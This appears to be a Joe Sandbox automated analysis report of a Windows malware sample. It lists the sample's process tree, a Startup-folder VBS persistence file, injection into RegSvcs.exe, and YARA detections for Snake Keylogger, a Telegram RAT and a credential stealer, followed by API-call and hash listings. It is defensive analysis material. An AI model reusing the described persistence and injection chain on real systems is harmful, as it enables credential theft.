00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	09:44:15
Start date:	08/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs"
Imagebase:	0x7ff7e5ea0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:44:16
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Local\Thebesian\reindulgence.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Thebesian\reindulgence.exe"
Imagebase:	0xf60000
File size:	1'111'040 bytes
MD5 hash:	EB8C8ACAE9D3A669129902384F5335B2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:44:20
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Thebesian\reindulgence.exe"
Imagebase:	0xa30000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.4503982433.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	2.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	57

Executed Functions

Function 00AA42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00AA430D

Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A

GetCurrentProcess.KERNEL32(?,00B3CB64,00000000,?,?), ref: 00AA4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00AA4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00AA4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AA4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00AA4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 00AA447B
GetSystemInfo.KERNEL32(?,?,?), ref: 00AA44A0

Strings

|O, xrefs: 00AE36F8
kernel32.dll, xrefs: 00AA444F
GetNativeSystemInfo, xrefs: 00AA4460

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: c87386940259280d32d87b1a354880ac706b92295ed3d48529ad40afb2c977bc
Instruction ID: 9d279624437f9a59dd468a3096eb8b8f671cc8e033a3463b36224515468e012d
Opcode Fuzzy Hash: c87386940259280d32d87b1a354880ac706b92295ed3d48529ad40afb2c977bc
Instruction Fuzzy Hash: 44A1D67290A2C0FFCB11CB7D7C451997FF46B6A300B168C99E08DA7AE2DB604584DB39

Function 00AA42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00AA50AA,?,?,00000000,00000000), ref: 00AA42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AA50AA,?,?,00000000,00000000), ref: 00AA42C9
LoadResource.KERNEL32(?,00000000,?,?,00AA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F20), ref: 00AE35BE
SizeofResource.KERNEL32(?,00000000,?,?,00AA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F20), ref: 00AE35D3
LockResource.KERNEL32(00AA50AA,?,?,00AA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F20,?), ref: 00AE35E6

Strings

SCRIPT, xrefs: 00AA42BF

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 99dd4a00ea63c583c0887f9465fb2f115afa3a45432539d44e7bde91a1a6d6b2
Instruction ID: 8bf6c444e22d256abdaa87ce9ed5e7d40808dd2e5fdb70adfda83064cb1c797d
Opcode Fuzzy Hash: 99dd4a00ea63c583c0887f9465fb2f115afa3a45432539d44e7bde91a1a6d6b2
Instruction Fuzzy Hash: 43113075240701BFD7218BA5DC49F677BB9EBC9B51F244169B50297290DBB1D8048760

Function 00AE2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00AA2B6B

Part of subcall function 00AA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B71418,?,00AA2E7F,?,?,?,00000000), ref: 00AA3A78

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00B62224), ref: 00AE2C10
ShellExecuteW.SHELL32(00000000,?,?,00B62224), ref: 00AE2C17

Strings

runas, xrefs: 00AE2C0B

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 2a598341a704a308407c82f3465058d3216a133c3627b576a44d7cc1cc06a48c
Instruction ID: 4621013bce0ad0effa53d24fa8b2c74bb7742026fa94b046e506e339cc27fc7f
Opcode Fuzzy Hash: 2a598341a704a308407c82f3465058d3216a133c3627b576a44d7cc1cc06a48c
Instruction Fuzzy Hash: 361106321083415BCB14FF68D952ABEBBA8AB97340F04486CF086571E2CF24895A9722

Function 00B0DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00AE5222), ref: 00B0DBCE
GetFileAttributesW.KERNELBASE(?), ref: 00B0DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 00B0DBEE
FindClose.KERNEL32(00000000), ref: 00B0DBFA

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 692ace9a3b184ea804505116e350d4cf1ff434ef2275eba92aa63e5506e90063
Instruction ID: d6237e7300428a8a87ecdc320c210c98e7fd97aedb3c303d7608a06a98cbc18e
Opcode Fuzzy Hash: 692ace9a3b184ea804505116e350d4cf1ff434ef2275eba92aa63e5506e90063
Instruction Fuzzy Hash: FAF0A03181092057D2306FF8AC0D8AF3FACDE01334B204B42F836D20E0EFB099548A95

Function 00AAD730 Relevance: 21.6, APIs: 14, Instructions: 619windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00AAD807
timeGetTime.WINMM ref: 00AADA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AADB28
TranslateMessage.USER32(?), ref: 00AADB7B
DispatchMessageW.USER32(?), ref: 00AADB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AADB9F
Sleep.KERNEL32(0000000A), ref: 00AADBB1

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: a04fd30b3702679dd297aa6cd9ec4a6af9d19eede387982197c9e36f303698c2
Instruction ID: e41857696c4a8d12f39457467beacc43cfe63deed272693dab9764df1be60d84
Opcode Fuzzy Hash: a04fd30b3702679dd297aa6cd9ec4a6af9d19eede387982197c9e36f303698c2
Instruction Fuzzy Hash: 4842BE30608245EFD729CF24C885BBABBF4BF46314F148959F596876E1DB70E884CB92

Function 00AA2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00AA2D07
RegisterClassExW.USER32(00000030), ref: 00AA2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA2D42
InitCommonControlsEx.COMCTL32(?), ref: 00AA2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA2D6F
LoadIconW.USER32(000000A9), ref: 00AA2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA2D94

Strings

TaskbarCreated, xrefs: 00AA2D37
0, xrefs: 00AA2CE9
AutoIt v3 GUI, xrefs: 00AA2D23
+, xrefs: 00AA2CF0

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 880cba9c3566544b71ddf38cbb190c971747734949722be1a0ee45117423bf23
Instruction ID: 8b4fff4dd75948aea1102ee7016bf98d3c3265bf0f0b96051fdf0ce6f642aa37
Opcode Fuzzy Hash: 880cba9c3566544b71ddf38cbb190c971747734949722be1a0ee45117423bf23
Instruction Fuzzy Hash: 9021D3B5911208EFDB009FE8EC49A9DBFB8FB08700F10451AEA15B72A0DBB145858FA4

Function 00AE065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AE039A: CreateFileW.KERNELBASE(00000000,00000000,?,00AE0704,?,?,00000000,?,00AE0704,00000000,0000000C), ref: 00AE03B7

GetLastError.KERNEL32 ref: 00AE076F
__dosmaperr.LIBCMT ref: 00AE0776
GetFileType.KERNELBASE(00000000), ref: 00AE0782
GetLastError.KERNEL32 ref: 00AE078C
__dosmaperr.LIBCMT ref: 00AE0795
CloseHandle.KERNEL32(00000000), ref: 00AE07B5
CloseHandle.KERNEL32(?), ref: 00AE08FF
GetLastError.KERNEL32 ref: 00AE0931
__dosmaperr.LIBCMT ref: 00AE0938

Strings

H, xrefs: 00AE08BD

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 94a2eb65954d62c599beb030bd0a2c2fda83b64a33485b594a89d3e59652cab8
Instruction ID: 75c17dfb9691f72a288282ecdf673f51a4f6c8d0f6d75bdfb99d225c41814dd3
Opcode Fuzzy Hash: 94a2eb65954d62c599beb030bd0a2c2fda83b64a33485b594a89d3e59652cab8
Instruction Fuzzy Hash: F2A12632A141848FDF19AF68D851FAE3BB1AB06320F24015EF815EF391DB719D92CB91

Function 00AA344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B71418,?,00AA2E7F,?,?,?,00000000), ref: 00AA3A78

Part of subcall function 00AA3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AA3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AA356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00AE318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00AE31CE
RegCloseKey.ADVAPI32(?), ref: 00AE3210
_wcslen.LIBCMT ref: 00AE3277
_wcslen.LIBCMT ref: 00AE3286

Strings

\Include\, xrefs: 00AA3527
Software\AutoIt v3\AutoIt, xrefs: 00AA3560
Include, xrefs: 00AE3184, 00AE31C5
\, xrefs: 00AE328C

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 054ac2bb3f9a0548cf358816fdb2453421689bb9a6fec43404bb41d101f8e307
Instruction ID: 9c4f4735ee4e83ee9c41021705b752b34710a44ec541037a890d6e9d19a92306
Opcode Fuzzy Hash: 054ac2bb3f9a0548cf358816fdb2453421689bb9a6fec43404bb41d101f8e307
Instruction Fuzzy Hash: F671E6724043019ED704EF65DD869ABBBF8FF99340F41082EF589971A0EF348A88CB56

Function 00AA2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00AA2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00AA2B9D
LoadIconW.USER32(00000063), ref: 00AA2BB3
LoadIconW.USER32(000000A4), ref: 00AA2BC5
LoadIconW.USER32(000000A2), ref: 00AA2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AA2BEF
RegisterClassExW.USER32(?), ref: 00AA2C40

Part of subcall function 00AA2CD4: GetSysColorBrush.USER32(0000000F), ref: 00AA2D07
Part of subcall function 00AA2CD4: RegisterClassExW.USER32(00000030), ref: 00AA2D31
Part of subcall function 00AA2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA2D42
Part of subcall function 00AA2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00AA2D5F
Part of subcall function 00AA2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA2D6F
Part of subcall function 00AA2CD4: LoadIconW.USER32(000000A9), ref: 00AA2D85
Part of subcall function 00AA2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA2D94

Strings

#, xrefs: 00AA2C16
0, xrefs: 00AA2C0F
AutoIt v3, xrefs: 00AA2C2F

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: e56af5c8030352f32693b1880cccc3c6b779fef1ff45fa63a220676d95a907b9
Instruction ID: 6745bcdea0cf355941a444524a92b67919b1e7ccf4d92175fec13c42ea5f620f
Opcode Fuzzy Hash: e56af5c8030352f32693b1880cccc3c6b779fef1ff45fa63a220676d95a907b9
Instruction Fuzzy Hash: 65212571A00318AFDB10DFADEC45AAD7FB4FB08B50F11041AE508A76A0DBB109848FA8

Function 00AA3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00AA316A,?,?), ref: 00AA31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,00AA316A,?,?), ref: 00AA3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AA3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00AA316A,?,?), ref: 00AA3232
CreatePopupMenu.USER32 ref: 00AA3246
PostQuitMessage.USER32(00000000), ref: 00AA3267

Strings

TaskbarCreated, xrefs: 00AA322D

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 2edc68201d05efd98f954ea10d67a9b9d4df90614a877b80b3327b2e6679b4ed
Instruction ID: ba846bb20cef8c81fe2198b1a0e060ae6452bb98a14d481ff58d05f993ca311c
Opcode Fuzzy Hash: 2edc68201d05efd98f954ea10d67a9b9d4df90614a877b80b3327b2e6679b4ed
Instruction Fuzzy Hash: 24412133240204AADF141F7C9D4ABBD3AA9EB57340F144626FA1A972E1CF618E8587B1

Function 00AD8D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 239edeeb7162cd248c238098b3e07ef3a92935c49b2ee8570b034c1af28779c9
Instruction ID: 5fa911cc808a6f814534c00d48f03339f712f44f9340dbd1754bbebf117d8a22
Opcode Fuzzy Hash: 239edeeb7162cd248c238098b3e07ef3a92935c49b2ee8570b034c1af28779c9
Instruction Fuzzy Hash: 68C1E574904349AFDF11EFA8D841BEEBBB1BF19310F14405AE51AAB392CB34D941CB61

Function 017C4398 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 017C43DD

Memory Dump Source

Source File: 00000000.00000002.2067721187.00000000017C3000.00000040.00000020.00020000.00000000.sdmp, Offset: 017C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17c3000_oagkiAhXgZ.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: 80737fff84c0ee8913965f915019a59109cb54fcc4a3b52ed1cc09c11d72ade5
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: 0051EB75A50208FBEB20DFA4DC59FDEB778AF48B01F208558F60AEB180DA749644CB60

Function 00AA2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AA2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AA2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00AA1CAD,?), ref: 00AA2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00AA1CAD,?), ref: 00AA2CCF

Strings

AutoIt v3, xrefs: 00AA2C89, 00AA2C8E, 00AA2C8F
edit, xrefs: 00AA2CAC

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: b4b1c560c882b7b68b3a7352c3e6b1e6ea4278e55b7f215f01d276a58eb430f6
Instruction ID: 654517136cac7bb3c8bf9c9ae99dfcf831e5f0ca6f49d396c91d233ab11100d2
Opcode Fuzzy Hash: b4b1c560c882b7b68b3a7352c3e6b1e6ea4278e55b7f215f01d276a58eb430f6
Instruction Fuzzy Hash: 80F0DA765503907AEB311B6FAC09E773EBDD7C6F50F12445AF908B35A0CA611890DAB8

Function 00B12947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

